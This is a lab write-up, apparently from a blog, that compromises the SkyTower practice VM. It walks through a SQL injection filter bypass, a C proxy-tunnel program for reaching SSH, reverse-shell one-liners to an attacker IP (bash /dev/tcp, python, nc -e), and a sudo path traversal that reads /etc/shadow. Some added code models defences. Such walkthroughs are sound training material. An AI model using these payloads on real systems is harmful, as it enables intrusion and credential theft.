1. Host discovery + information gathering
arp-scan -l
Set an environment variable for the target
export ip=192.168.2.193
Port scan
nmap --min-rate 10000 -p- $ip
PORT     STATE    SERVICE
22/tcp   filtered ssh
80/tcp   open     http
3128/tcp open     squid-http
MAC Address: 00:0C:29:A7:0A:46 (VMware)
Service information gathering
nmap -sS -sV -O -p22,80,3128 $ip
PORT     STATE    SERVICE    VERSION
22/tcp   filtered ssh
80/tcp   open     http       Apache httpd 2.2.22 ((Debian))
3128/tcp open     http-proxy Squid http proxy 3.1.20
MAC Address: 00:0C:29:A7:0A:46 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.16
Network Distance: 1 hop
Script scan (vuln category)
nmap --script=vuln -p22,80,3128 $ip
PORT     STATE    SERVICE
22/tcp   filtered ssh
80/tcp   open     http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=bogon
|   Found the following possible CSRF vulnerabilities:
|
|     Path: http://bogon:80/
|     Form id:
|_    Form action: login.php
3128/tcp open     squid-http
MAC Address: 00:0C:29:A7:0A:46 (VMware)
2. Starting the penetration test
Web application on port 80
On first visit we find a login page

Enter something arbitrary
123'
12
We find a SQL injection

With SQL injection present, try the classic authentication-bypass payload
123' or 1=1 --+
1


The message above shows that = and -- are being filtered out
= can be replaced with LIKE
the -- comment marker can be replaced with #

= and -- are now replaced successfully, but it still errors: or is being filtered too, so we try a double-write bypass, oorr
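As an added illustration (not code from the original post or the SkyTower box), the following Python models why a single-pass blocklist of this kind fails and how a parameterized query removes the problem; sqlite3 stands in for MySQL, the filter's exact behaviour is an assumption, and the table rows are constructed from the dump shown later on the page.

```python
import sqlite3

# Constructed sample table, mirroring the SkyTech login table dumped later on the page.
ROWS = [(1, "john@skytech.com", "hereisjohn"),
        (2, "sara@skytech.com", "ihatethisjob"),
        (3, "william@skytech.com", "senseable")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE login (id INTEGER, email TEXT, password TEXT)")
    conn.executemany("INSERT INTO login VALUES (?, ?, ?)", ROWS)
    return conn


def blocklist_filter(value):
    """Assumed model of the page's login filter: a single pass that deletes
    '=', '--' and 'or'. Deleting a token once joins its neighbours, so a
    doubled keyword ('oorr') collapses back into the banned one."""
    for banned in ("=", "--", "or"):
        value = value.replace(banned, "")
    return value


def login_vulnerable(conn, email, password):
    """Filtered input concatenated into the query (the page's login.php pattern).
    sqlite3 has no '#' comment like MySQL, so the demo payload re-opens the
    quote instead of commenting out the rest of the query."""
    e, p = blocklist_filter(email), blocklist_filter(password)
    sql = f"SELECT id, email FROM login WHERE email='{e}' AND password='{p}'"
    return conn.execute(sql).fetchone()


def login_parameterized(conn, email, password):
    """Hardened form: placeholders keep input as data, so no blocklist is needed."""
    sql = "SELECT id, email FROM login WHERE email=? AND password=?"
    return conn.execute(sql, (email, password)).fetchone()


if __name__ == "__main__":
    db = make_db()
    payload = "123' oorr 1 LIKE 1 oorr '"          # the page's substitutions, minus '#'
    print(blocklist_filter(payload))                # 123' or 1 LIKE 1 or '
    print(login_vulnerable(db, payload, "x"))       # (1, 'john@skytech.com')
    print(login_parameterized(db, payload, "x"))    # None
```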


Login succeeds, and we obtain a set of credentials
john
hereisjohn
So let's try an SSH login on port 22
ssh john@192.168.2.193
But it is filtered. We notice there is still the proxy service on port 3128 that we haven't used
curl -x http://192.168.2.193:3128 http://192.168.2.193
Use curl through this proxy to access the web app

Directory brute-forcing (with and without the proxy)
Normal directory brute-force
gobuster dir -u http://192.168.2.193/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
or: dirsearch -u http://192.168.2.193

Directory brute-force through the proxy
dirsearch -u http://192.168.2.193/ -e * --proxy http://192.168.2.193:3128

Both give the same results
Try an SSH connection through the proxy
1. Write the connect.c program
connect.c lets us establish a TCP connection through an HTTP proxy using the CONNECT method
Contents:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <signal.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>

#define BUFSIZE 4096

/* Relays stdin/stdout to targethost:targetport through an HTTP proxy using the
 * CONNECT method, so it can serve as an ssh ProxyCommand. */
int main(int argc, char *argv[]) {
    int sockfd, portno, n;
    struct sockaddr_in serv_addr;
    struct hostent *server;
    char buffer[BUFSIZE];
    if (argc != 5 || strcmp(argv[1], "-H") != 0) {
        fprintf(stderr, "Usage: %s -H proxyhost:proxyport targethost targetport\n", argv[0]);
        exit(0);
    }
    /* Split "proxyhost:proxyport" */
    char *proxyhost = strtok(argv[2], ":");
    char *proxyport_str = strtok(NULL, ":");
    if (proxyhost == NULL || proxyport_str == NULL) {
        fprintf(stderr, "Invalid proxy specification\n");
        exit(1);
    }
    portno = atoi(proxyport_str);
    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    if (sockfd < 0) {
        perror("ERROR opening socket");
        exit(1);
    }
    server = gethostbyname(proxyhost);
    if (server == NULL) {
        fprintf(stderr, "ERROR, no such host as %s\n", proxyhost);
        exit(0);
    }
    bzero((char *)&serv_addr, sizeof(serv_addr));
    serv_addr.sin_family = AF_INET;
    bcopy((char *)server->h_addr, (char *)&serv_addr.sin_addr.s_addr, server->h_length);
    serv_addr.sin_port = htons(portno);
    /* TCP connection to the proxy itself */
    if (connect(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0) {
        perror("ERROR connecting");
        exit(1);
    }
    /* Ask the proxy to open a tunnel to the real target */
    snprintf(buffer, BUFSIZE, "CONNECT %s:%s HTTP/1.0\r\n\r\n", argv[3], argv[4]);
    n = write(sockfd, buffer, strlen(buffer));
    if (n < 0) {
        perror("ERROR writing to socket");
        exit(1);
    }
    bzero(buffer, BUFSIZE);
    n = read(sockfd, buffer, BUFSIZE - 1);
    if (n < 0) {
        perror("ERROR reading from socket");
        exit(1);
    }
    /* Expect a "HTTP/1.x 200 ..." status line (accept HTTP/1.0 and HTTP/1.1 replies,
     * and only a 200, not any 2xx) */
    if (n < 12 || strncmp(buffer, "HTTP/1.", 7) != 0 || strncmp(buffer + 9, "200", 3) != 0) {
        fprintf(stderr, "Proxy connection failed: %s\n", buffer);
        exit(1);
    }
    /* Anything the proxy delivered after its header already belongs to the target
     * (for ssh, the server banner), so pass it on instead of dropping it */
    char *hdr_end = strstr(buffer, "\r\n\r\n");
    if (hdr_end != NULL && hdr_end + 4 < buffer + n) {
        write(1, hdr_end + 4, (buffer + n) - (hdr_end + 4));
    }
    int pid = fork();
    if (pid < 0) {
        perror("ERROR forking");
        exit(1);
    }
    if (pid == 0) {
        // Child process: copy stdin to socket
        while ((n = read(0, buffer, BUFSIZE)) > 0) {
            write(sockfd, buffer, n);
        }
        close(sockfd);
        exit(0);
    } else {
        // Parent process: copy socket to stdout
        while ((n = read(sockfd, buffer, BUFSIZE)) > 0) {
            write(1, buffer, n);
        }
        close(sockfd);
        kill(pid, SIGTERM);
        exit(0);
    }
}
Compile with GCC
gcc -o connect connect.c
2. Connect to SSH through the proxy
Use the compiled connect program as ssh's ProxyCommand to establish the SSH connection:
ssh john@192.168.2.193 -o ProxyCommand="./connect -H 192.168.2.193:3128 %h %p"
OK, going through the proxy we are no longer filtered

But the connection succeeds and then drops again; perhaps the proxy layer is unstable

ssh john@192.168.2.193 -o ProxyCommand="./connect -H 192.168.2.193:3128 %h %p" id
No problem, as long as we can execute commands; we'll use this to get an interactive reverse shell

3. Obtaining initial access
Append a reverse-shell command to the ssh command
ssh john@192.168.2.193 -o ProxyCommand="./connect -H 192.168.2.193:3128 %h %p" 'bash -i >& /dev/tcp/192.168.2.128/4444 0>&1'

bash -i is blocked; try something else
ssh john@192.168.2.193 -o ProxyCommand="./connect -H 192.168.2.193:3128 %h %p" 'python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.2.128",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);"'
No python either; keep trying

nc is available, and connecting with nc succeeds
ssh john@192.168.2.193 -o ProxyCommand="./connect -H 192.168.2.193:3128 %h %p" 'nc 192.168.2.128 4444 -e /bin/sh'

4. Privilege escalation
cd ~
ls -liah
There is a .bashrc in the user's home directory
View it with cat
So the connection dropped right after connecting because the last line of .bashrc is an exit command

cd /var/www
cat login.php
We find the mysqli database credentials

But our current shell is non-interactive, so we first need to upgrade it
Go back to john's home directory and delete the final exit command
cd ~
sed -i '$d' .bashrc
Then reconnect via ssh as john
ssh john@192.168.2.193 -o ProxyCommand="./connect -H 192.168.2.193:3128 %h %p"

MySQL login
mysql -u root -p
Password: root
SHOW DATABASES; (don't forget the trailing semicolon; I forgot it and had to retype it several times)

USE SkyTech;
SHOW TABLES;

select * from login;

+----+---------------------+--------------+
| id | email               | password     |
+----+---------------------+--------------+
|  1 | john@skytech.com    | hereisjohn   |
|  2 | sara@skytech.com    | ihatethisjob |
|  3 | william@skytech.com | senseable    |
+----+---------------------+--------------+
john@SkyTower:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false
john:x:1000:1000:john,,,:/home/john:/bin/bash
sara:x:1001:1001:,,,:/home/sara:/bin/bash
william:x:1002:1002:,,,:/home/william:/bin/bash
This matches the three users from the database:
sara / ihatethisjob
william / senseable
Switching with su user doesn't work
So use the same method as before: get in by running /bin/bash directly, then delete the exit from the file
ssh sara@192.168.2.193 -o ProxyCommand="./connect -H 192.168.2.193:3128 %h %p" /bin/bash
sed -i '$d' .bashrc
Ctrl+C to exit, then log in again with the ssh command
ssh sara@192.168.2.193 -o ProxyCommand="./connect -H 192.168.2.193:3128 %h %p"
sudo -l

sudo su: this is still not the final user
So only william is left
We find this user can run cat as root on /accounts/*
So we can use the parent-directory trick to read /etc/shadow
sudo cat /accounts/../etc/shadow
john:$6$a39powbs$ditVKZ1waa6vJEh3BG1d5jLv/uADKcl.r1kcA.XKyhNfJoiDhSdwmSZel3V5cZ/S6ec3wd8rdNA2dOznTXhl0/:16198:0:99999:7:::
sara:$6$2PvpHNG0$hbaMRd5fZhWMDHyyhGHINSy.qBHnvP4QW1k9RSwv.pQM6SoZey53C7S7aF6263ae6qx5TwVA6sahf5tebUqvY1:16198:0:99999:7:::
william:$6$c3VykdoT$qRUKl1e77skTm0sLHavRSp8mUJfMIPrJBovrXC8o9GY8/P7gpasSbvtqA0rn9.HyxjKhSVji8/CzHNFLit3GU1:16241:0:99999:7:::
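An added Python example (not from the original post) showing why the sudoers rule above is escapable and what a sudoers audit or a wrapper script should check instead; the sudoers fragment is constructed to match the rule the page describes, not copied from the box.

```python
import fnmatch
import os
import re

# Constructed sudoers fragment matching the rule the page describes; the real
# file on the box is not shown on the page.
SAMPLE_SUDOERS = """\
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
sara    ALL=(root) /bin/cat /accounts/*, (root) /bin/ls /accounts/*
"""


def sudo_glob_allows(pattern, argument):
    """How sudoers matches a wildcard argument: fnmatch(3) on the raw string.
    '*' also matches '/' and '..', which is why the traversal above is allowed."""
    return fnmatch.fnmatchcase(argument, pattern)


def stays_within(root, argument):
    """Check a wrapper script should make instead of trusting the glob: normalise
    the path and require it to remain under the intended directory. Use
    os.path.realpath in production so symlinks are resolved as well."""
    root = os.path.normpath(root)
    resolved = os.path.normpath(os.path.join(root, argument))
    return resolved == root or resolved.startswith(root + os.sep)


def audit_wildcard_rules(sudoers_text):
    """Flag every command spec whose arguments contain a wildcard."""
    findings = []
    for line in sudoers_text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", "Defaults")):
            continue
        user_host, _, spec = line.partition("=")
        user = user_host.split()[0]
        for cmd in spec.split(","):
            cmd = re.sub(r"^\([^)]*\)\s*", "", cmd.strip())  # drop "(runas)"
            parts = cmd.split(None, 1)
            if len(parts) == 2 and "*" in parts[1]:
                findings.append((user, cmd))
    return findings


if __name__ == "__main__":
    print(sudo_glob_allows("/accounts/*", "/accounts/../etc/shadow"))  # True
    print(stays_within("/accounts", "/accounts/../etc/shadow"))        # False
    print(audit_wildcard_rules(SAMPLE_SUDOERS))
```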
But these are all salted hashes; is brute-forcing the only option?
Let's first use the same method to look for other information
sudo cat /accounts/../root/flag.txt
sara@SkyTower:/$ sudo cat /accounts/../root/flag.txt
Congratz, have a cold one to celebrate! root password is theskytower
OK, we found the password
su to switch to root
Password: theskytower
5. Privilege escalation succeeded

Unless otherwise noted, all articles on this blog are the author's original work.
If you repost, please credit the source: https://www.oneblanks.xyz/skytower%e9%9d%b6%e6%9c%ba%e7%bb%83%e4%b9%a0/